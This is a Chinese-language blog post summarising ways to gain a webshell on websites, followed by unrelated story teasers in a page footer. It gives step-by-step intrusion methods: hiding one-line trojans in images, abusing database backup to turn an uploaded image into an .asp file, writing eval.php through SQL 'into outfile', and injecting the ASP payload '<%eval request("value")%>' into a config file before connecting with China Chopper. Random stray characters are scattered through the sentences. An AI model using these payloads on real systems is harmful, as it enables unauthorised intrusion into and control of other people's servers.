獲取webshell的一些總結


?????????????????????????????????? 獲取webshell總結

????????????????????????????????????????????????????????????????????????????????????????????????????????????????????????? 8月6號

1.CMS獲取Webshell

方法:通過百度搜索引擎搜索cms網站程序名稱

如:phpcms拿webshell瞭稼,discuz獲取webshell(通過一些模板,填ip地址的地方抓包改包蹭秋,上傳圖片木馬)衷恭,phpwind拿webshell(用戶等級管理插一句話此叠,臟話過濾插一句話,模板插一句話)随珠,WordPress拿后臺webshell



2.非CMS獲取webshell

1)數(shù)據(jù)庫備份獲取webshell

例子:

南方數(shù)據(jù)企業(yè)網站系統(tǒng)灭袁,首先在網站后臺找猬错,看有沒有數(shù)據(jù)庫備份,如果有那么你就來備份茸歧,就是你把一句話插入到圖片里面倦炒,再把圖片備份成asp,php(看他網站是用什么寫的软瞎,擴展名)逢唤。

當然還需要有后臺文件上傳的地方,我們要注意下(可能網站會限制擴展名,所以你要修改擴展名涤浇,比如.txt改為.jpg),并且找到文件上傳的路徑智玻,用火狐的插件firebug查看網絡元素,如下圖:



這里其實是沒有上傳成功芙代,是因為網站源代碼做了檢測內容吊奢,就是說你改個擴展名,雖然滿足上傳條件纹烹,但是內容被檢測出來了(看是不是真的有圖片格式)页滚。

那么他怎么判斷的呢?我們看下正常圖片和不正常圖片铺呵,正常圖片是由一個文件頭的裹驰,代表是圖片文件,不正常的圖片就沒有片挂。所以幻林!我們需要偽造圖片格式,怎么做呢音念?

我們把真正的圖片和我們的一句話木馬圖片合并(可以使用edjpgcom.exe沪饺,把真正的圖片拖到工具,然后插上一句話或者各種大馬闷愤,就生成了另一個圖片整葡,圖片正常顯示,但是圖片中包含木馬讥脐,我沒試過直接把一句話復制到真正的圖片中過遭居,但是好像別人成功過,然后linux里是可以直接合并兩個文件的)旬渠,這個時候我們上傳:





有的時候俱萍,可能在




這兩個地方是灰色的或是上傳按鈕有問題的時候,就是你上傳不了告丢,那么你可以右鍵->使用firebug審查元素枪蘑,你可以看到框架




當我們點擊提交時,我們會將文件上傳到”,,/upload_other.asp”,我們就可以通過這個路徑上傳文件啦腥寇!

我們來到數(shù)據(jù)庫備份成翩,將數(shù)據(jù)庫路徑改為我們圖片所在目錄”../UploadFiles/20164232231339933.jpg”(不過,有的網站這個地方不可編輯赦役,因為需要FSO權限).........這種情況下,我們可以通過firebug在html框架里面修改value值





此時我們成功備份麻敌,訪問我們的shell:



2)抓包上傳獲取webshell(在文件上傳漏洞,iis中間件漏洞掂摔,解析漏洞术羔,JavaScript突破...中會介紹,暫時沒記錄)

使用burp抓包乙漓。明小子也可以用(綜合上傳模塊级历,不過不怎么用了),還是使用burp吧

3)sql命令獲取webshell(用Select '' into outfile 'c:/wwwtest/eval.php')

在這個dedecms中有一個生sql命令行工具模塊



注:c:/wwwtest/eval.php呢叭披,是你在網站的根目錄常見一個名為eval的php文件(前提是你知道了網站目錄路徑寥殖,這個目錄根據(jù)不同環(huán)境當然不同)

4)模板修改獲取webshell

5)插入一句話獲取webshell

插一句話需要注意的地方,在這個南方數(shù)據(jù)企業(yè)網站管理系統(tǒng)里面涩蜘,你需要知道它的網站配置文件在INC目錄下的config.asp文件中的(你可以去網上下載這些公開的文件嚼贡,像我很簡單的那個織夢,又或者是這個同诫,down下來看看)粤策,如果這些配置文件都是寫入到asp里面的,那么我們的一句話也是可以寫入進去的误窖,一保存叮盘,就寫入配置文件了。

Asp一句話:

<%eval request("value")%>

但是我們這樣寫進去霹俺,這個頁面就崩潰了柔吼。我們需要寫成”%><%eval request("value")%><%’

那我們?yōu)槭裁匆獙懗蓪懗蛇@種形式才能起到作用呢:”%><%eval request("value")%><%’

其實<%和%>是asp文件的開端和結束標志

如果我們要在配置文件的這里:const SiteName=”南方數(shù)據(jù)企業(yè)管理系統(tǒng)”??????????? ‘網站名稱

插入一句話木馬,我們首先要閉合南方二字前的”和最開始的<%吭服,所以我們要在一句話前面加上”%>

那么后面的<%’呢嚷堡???????????? <%是閉合最后面的%>結束標志,’單引號是為了閉合網站名稱的單引號艇棕,這樣語法就不會錯了!4堋沼琉!如圖:




細心一點會發(fā)現(xiàn)我們的單引號之間不是有個”雙引號么,不會報錯么桩匪?因為這個被包含在一對閉合的單引號之間打瘪,所以不會出問題,你在后臺代碼去掉也沒問題,那我們不去掉是因為闺骚,你在前端這樣寫一句話木馬彩扔,是做不到去掉的,所以就讓他這樣放著吧

用菜刀連接僻爽,把地址寫上“http://網址/inc/config.asp”,密碼就是那個chopper



6)修改上傳類型獲取webshell

參考文章:gatarwd.iteye.com/blog/542376

https://www.webshell.ren/post-121.html

3.其他獲取webshell方法(中間件:phpmyadmin虫碉,tomcat,weblogic..)

1)PhpMyadmin(管理數(shù)據(jù)庫的軟件)獲取webshell

2)Tomcat獲取webshell

3)Weblogic獲取webshell

4)JBoss獲取webshell

最后編輯于
?著作權歸作者所有,轉載或內容合作請聯(lián)系作者
  • 序言:七十年代末胸梆,一起剝皮案震驚了整個濱河市敦捧,隨后出現(xiàn)的幾起案子,更是在濱河造成了極大的恐慌碰镜,老刑警劉巖兢卵,帶你破解...
    沈念sama閱讀 206,126評論 6 481
  • 序言:濱河連續(xù)發(fā)生了三起死亡事件,死亡現(xiàn)場離奇詭異绪颖,居然都是意外死亡秽荤,警方通過查閱死者的電腦和手機,發(fā)現(xiàn)死者居然都...
    沈念sama閱讀 88,254評論 2 382
  • 文/潘曉璐 我一進店門柠横,熙熙樓的掌柜王于貴愁眉苦臉地迎上來王滤,“玉大人,你說我怎么就攤上這事滓鸠⊙阆纾” “怎么了?”我有些...
    開封第一講書人閱讀 152,445評論 0 341
  • 文/不壞的土叔 我叫張陵糜俗,是天一觀的道長踱稍。 經常有香客問我,道長悠抹,這世上最難降的妖魔是什么珠月? 我笑而不...
    開封第一講書人閱讀 55,185評論 1 278
  • 正文 為了忘掉前任,我火速辦了婚禮楔敌,結果婚禮上啤挎,老公的妹妹穿的比我還像新娘。我一直安慰自己卵凑,他們只是感情好庆聘,可當我...
    茶點故事閱讀 64,178評論 5 371
  • 文/花漫 我一把揭開白布。 她就那樣靜靜地躺著勺卢,像睡著了一般伙判。 火紅的嫁衣襯著肌膚如雪。 梳的紋絲不亂的頭發(fā)上黑忱,一...
    開封第一講書人閱讀 48,970評論 1 284
  • 那天宴抚,我揣著相機與錄音勒魔,去河邊找鬼。 笑死菇曲,一個胖子當著我的面吹牛冠绢,可吹牛的內容都是我干的。 我是一名探鬼主播常潮,決...
    沈念sama閱讀 38,276評論 3 399
  • 文/蒼蘭香墨 我猛地睜開眼弟胀,長吁一口氣:“原來是場噩夢啊……” “哼!你這毒婦竟也來了蕊玷?” 一聲冷哼從身側響起邮利,我...
    開封第一講書人閱讀 36,927評論 0 259
  • 序言:老撾萬榮一對情侶失蹤,失蹤者是張志新(化名)和其女友劉穎垃帅,沒想到半個月后延届,有當?shù)厝嗽跇淞掷锇l(fā)現(xiàn)了一具尸體,經...
    沈念sama閱讀 43,400評論 1 300
  • 正文 獨居荒郊野嶺守林人離奇死亡贸诚,尸身上長有42處帶血的膿包…… 初始之章·張勛 以下內容為張勛視角 年9月15日...
    茶點故事閱讀 35,883評論 2 323
  • 正文 我和宋清朗相戀三年方庭,在試婚紗的時候發(fā)現(xiàn)自己被綠了。 大學時的朋友給我發(fā)了我未婚夫和他白月光在一起吃飯的照片酱固。...
    茶點故事閱讀 37,997評論 1 333
  • 序言:一個原本活蹦亂跳的男人離奇死亡械念,死狀恐怖,靈堂內的尸體忽然破棺而出运悲,到底是詐尸還是另有隱情龄减,我是刑警寧澤,帶...
    沈念sama閱讀 33,646評論 4 322
  • 正文 年R本政府宣布班眯,位于F島的核電站希停,受9級特大地震影響,放射性物質發(fā)生泄漏署隘。R本人自食惡果不足惜宠能,卻給世界環(huán)境...
    茶點故事閱讀 39,213評論 3 307
  • 文/蒙蒙 一、第九天 我趴在偏房一處隱蔽的房頂上張望磁餐。 院中可真熱鬧违崇,春花似錦、人聲如沸诊霹。這莊子的主人今日做“春日...
    開封第一講書人閱讀 30,204評論 0 19
  • 文/蒼蘭香墨 我抬頭看了看天上的太陽畅哑。三九已至肴楷,卻和暖如春,著一層夾襖步出監(jiān)牢的瞬間荠呐,已是汗流浹背赛蔫。 一陣腳步聲響...
    開封第一講書人閱讀 31,423評論 1 260
  • 我被黑心中介騙來泰國打工牺勾, 沒想到剛下飛機就差點兒被人妖公主榨干…… 1. 我叫王不留蔓榄,地道東北人。 一個月前我還...
    沈念sama閱讀 45,423評論 2 352
  • 正文 我出身青樓墓赴,卻偏偏與公主長得像媚创,于是被迫代替她去往敵國和親渗钉。 傳聞我的和親對象是個殘疾皇子,可洞房花燭夜當晚...
    茶點故事閱讀 42,722評論 2 345

推薦閱讀更多精彩內容